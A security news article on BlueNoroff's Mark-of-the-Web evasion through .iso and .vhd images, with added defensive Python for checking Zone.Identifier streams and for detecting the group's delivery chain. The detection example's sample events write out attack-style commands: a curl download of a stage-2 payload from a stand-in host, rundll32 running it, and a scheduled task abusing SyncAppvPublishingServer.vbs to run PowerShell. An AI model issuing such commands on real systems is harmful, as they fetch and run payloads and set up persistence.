Cybersecurity firm Kaspersky has released new information about BlueNoroff, a financially motivated group that targets the cryptocurrency industry. In October, Kaspersky observed the group adopting new infection methods and file types designed to evade Mark-of-the-Web (MOTW), the Windows protection that flags files downloaded from the internet so that Office opens them in Protected View and Windows warns the user before running them. BlueNoroff has been packaging its payloads in .iso and .vhd disk images: the downloaded image carries the mark, but the files inside it, once the image is mounted, do not, so they open without the warning.
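The mark itself is an NTFS alternate data stream named Zone.Identifier attached to the downloaded file. The Python below, added here as an illustration and not code from Kaspersky or from this article, reads and parses that stream, reports which container types lose it on mounting, and re-applies a mark to a file that was copied out of an image. The list of mounted image types, the sample stream content and the example.invalid host are assumptions constructed for the example; the stream syntax ("path:Zone.Identifier") only works on Windows NTFS, and the functions return None/False elsewhere rather than failing.

```python
"""Inspecting and re-applying the Mark-of-the-Web (example code, not Kaspersky's)."""
import os
from pathlib import Path
from typing import Dict, Optional

# Image formats Windows mounts as a separate volume when opened. The
# Zone.Identifier stream is attached to the downloaded image file itself, not
# to the files inside it, so an executable launched from the mounted volume
# carries no mark. (Assumption for this example: the list is not exhaustive.)
MOUNTED_IMAGE_TYPES = {".iso", ".img", ".vhd", ".vhdx"}

# URL security zone ids used in the ZoneId field.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Parse the INI-style Zone.Identifier stream into a dict.

    Typical content is a [ZoneTransfer] section with ZoneId and, from modern
    browsers, ReferrerUrl and HostUrl. Lines outside that section are ignored.
    """
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def format_zone_identifier(zone_id: int = 3, referrer: str = "", host: str = "") -> str:
    """Build the stream text Windows expects (CRLF line endings)."""
    lines = ["[ZoneTransfer]", f"ZoneId={zone_id}"]
    if referrer:
        lines.append(f"ReferrerUrl={referrer}")
    if host:
        lines.append(f"HostUrl={host}")
    return "\r\n".join(lines) + "\r\n"


def zone_name(fields: Dict[str, str]) -> str:
    """Human-readable zone for a parsed stream ("Unknown" if absent or invalid)."""
    try:
        return ZONE_NAMES.get(int(fields.get("ZoneId", "")), "Unknown")
    except ValueError:
        return "Unknown"


def read_motw(path: str) -> Optional[Dict[str, str]]:
    """Return the parsed Zone.Identifier stream of `path`, or None.

    None means the file carries no mark: it was not downloaded, it was opened
    from inside a mounted image, or the volume is not NTFS. The "path:stream"
    syntax is only meaningful on Windows; elsewhere the open() simply fails.
    """
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None


def apply_motw(path: str, zone_id: int = 3) -> bool:
    """Re-attach a mark to a file copied out of a mounted image so that
    Protected View and the SmartScreen prompt apply again. Windows/NTFS only."""
    if os.name != "nt":
        return False
    try:
        with open(f"{path}:Zone.Identifier", "w", encoding="utf-8", newline="") as f:
            f.write(format_zone_identifier(zone_id))
        return True
    except OSError:
        return False


def loses_motw_when_opened(filename: str) -> bool:
    """True for downloads whose contents Windows exposes via a mounted volume,
    i.e. where the inner files will have no Zone.Identifier of their own."""
    return Path(filename).suffix.lower() in MOUNTED_IMAGE_TYPES


if __name__ == "__main__":
    # Constructed stream content, as a browser would write it for an Internet download.
    SAMPLE_STREAM = "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=https://example.invalid/d.iso\r\n"
    fields = parse_zone_identifier(SAMPLE_STREAM)
    print(zone_name(fields), fields)
    print(loses_motw_when_opened("d.iso"))
```

A defender can use read_motw() in a triage script to confirm that a file a user launched from a mounted .iso really had no mark, and apply_motw() to tag files that must be copied out of an image before use, so that the normal Office and SmartScreen checks run on them.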
In addition to these formats, the group has been testing other file types for its droppers, including Visual Basic Script (.vbs), Windows batch (.bat) files and Windows executables, to refine its delivery. Kaspersky has identified more than 70 domains used by the group, indicating that it remained active up to the time of the report. Many of these domains imitate Japanese venture capital companies, suggesting that BlueNoroff has a particular interest in Japanese financial entities.
For initial intrusion, BlueNoroff has relied on Word documents and Windows shortcut (.lnk) files. In one observed campaign, the group sent a malicious Word document to a victim in the UAE; when the document was opened it connected to a remote server and downloaded the payload. The group has also abused SyncAppvPublishingServer.vbs, a legitimate Microsoft script shipped in the Windows System32 folder, to run PowerShell code from a Windows scheduled task.
Kaspersky also found BlueNoroff using batch files together with signed Windows binaries such as mshta.exe and rundll32.exe (living-off-the-land binaries) to run its malware, showing the victim a decoy document while fetching the next-stage payload with curl commands.
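The two paragraphs above describe a chain that shows up clearly in process-creation telemetry: an Office process starting a shell, curl pulling a payload, rundll32 or mshta executing it, and a scheduled task wrapping SyncAppvPublishingServer.vbs around PowerShell. The Python below is an added example, not Kaspersky's detection content or anything from this article, of simple rules over such events. It assumes Sysmon Event ID 1 / Security 4688 style fields (ParentImage, Image, CommandLine); the sample events, paths and the example.invalid host are constructed. The SyncAppvPublishingServer.vbs rule relies on the documented behaviour that the script passes its first argument to PowerShell, so a ';' inside that argument runs attacker-chosen code; treating any ';' as suspicious is an assumption of this example.

```python
"""Process-creation rules for the BlueNoroff-style delivery chain (example code,
not Kaspersky's). Events are dicts with ParentImage, Image and CommandLine, as a
Sysmon Event ID 1 or Security 4688 record provides. SAMPLE_EVENTS are constructed."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "curl.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(e: Event) -> bool:
    """Word/Excel starting a shell, script host or LOLBin: the document stage."""
    return basename(e["ParentImage"]) in OFFICE and basename(e["Image"]) in SHELLS_AND_LOLBINS


def syncappv_abuse(e: Event) -> bool:
    """SyncAppvPublishingServer.vbs hands its first argument to PowerShell, so a
    ';' in that argument runs extra PowerShell (documented LOLBAS behaviour).
    Assumption: legitimate callers never pass ';'."""
    cl = e["CommandLine"]
    return "syncappvpublishingserver.vbs" in cl.lower() and ";" in cl


def schtask_runs_script(e: Event) -> bool:
    """schtasks.exe creating a task whose action is a VBS, PowerShell or LOLBin."""
    cl = e["CommandLine"].lower()
    return (basename(e["Image"]) == "schtasks.exe" and "/create" in cl
            and any(t in cl for t in (".vbs", "powershell", "mshta", "rundll32")))


def lolbin_from_batch(e: Event) -> bool:
    """mshta.exe or rundll32.exe launched by cmd.exe (a batch-file stage)."""
    return basename(e["ParentImage"]) == "cmd.exe" and basename(e["Image"]) in {"mshta.exe", "rundll32.exe"}


def curl_fetch(e: Event) -> bool:
    """curl.exe fetching a URL on behalf of a document, shell or script host."""
    return (basename(e["Image"]) == "curl.exe"
            and URL_RE.search(e["CommandLine"]) is not None
            and basename(e["ParentImage"]) in OFFICE | {"cmd.exe", "powershell.exe",
                                                        "wscript.exe", "cscript.exe", "mshta.exe"})


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("office_spawns_shell", office_spawns_shell),
    ("syncappv_abuse", syncappv_abuse),
    ("schtask_runs_script", schtask_runs_script),
    ("lolbin_from_batch", lolbin_from_batch),
    ("curl_fetch", curl_fetch),
]


def run_rules(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule name, event index) for every rule each event triggers."""
    return [(name, i) for i, e in enumerate(events) for name, rule in RULES if rule(e)]


# Constructed sample telemetry: indices 0-4 imitate the chain in the text, 5-7 are benign.
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": SYS32 + r"\cmd.exe", "CommandLine": r'cmd.exe /c "C:\Users\Public\run.bat"'},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\Public\stage2.dat https://example.invalid/stage2"},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\stage2.dat,Start"},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\schtasks.exe",
     "CommandLine": (r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "wscript.exe '
                     + SYS32 + r'\SyncAppvPublishingServer.vbs \"n; & C:\Users\Public\stage2.ps1\""')},
    {"ParentImage": SYS32 + r"\svchost.exe", "Image": SYS32 + r"\wscript.exe",
     "CommandLine": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; & C:\Users\Public\stage2.ps1"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n C:\Users\alice\invoice.docx'},
    {"ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\curl.exe", "CommandLine": "curl.exe --version"},
    {"ParentImage": SYS32 + r"\svchost.exe", "Image": SYS32 + r"\wscript.exe",
     "CommandLine": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n"'},
]

if __name__ == "__main__":
    for name, idx in run_rules(SAMPLE_EVENTS):
        print(f"{name:22s} event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Each rule on its own will fire on some legitimate administration; the value is in the sequence, so in practice you would correlate the hits by host and by parent process within a short window rather than alert on any single one.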
Cryptocurrency traders and the firms they work for should treat this campaign as a live threat. Be suspicious of unsolicited Word documents and of any .iso or .vhd attachment, which is an unusual way to deliver a document; keep security software and Windows itself up to date; and make sure monitoring covers the tactics described above, in particular MOTW evasion via disk images and the abuse of script hosts and scheduled tasks.
Precautions everyone should heed to avoid becoming a victim
- Use strong, unique passwords for every account, never reuse a password across accounts, and change any password you suspect has been exposed
- Avoid clicking on links or downloading attachments from unknown sources
- Enable two-factor authentication whenever possible
- Use reputable antivirus software and keep it updated
- Enable firewall protection on your devices
- Keep your operating system and other software up to date with the latest security patches
- Avoid using public Wi-Fi networks for sensitive activities
- Be cautious when sharing personal or financial information online
- Regularly back up your important data so it can be restored after an attack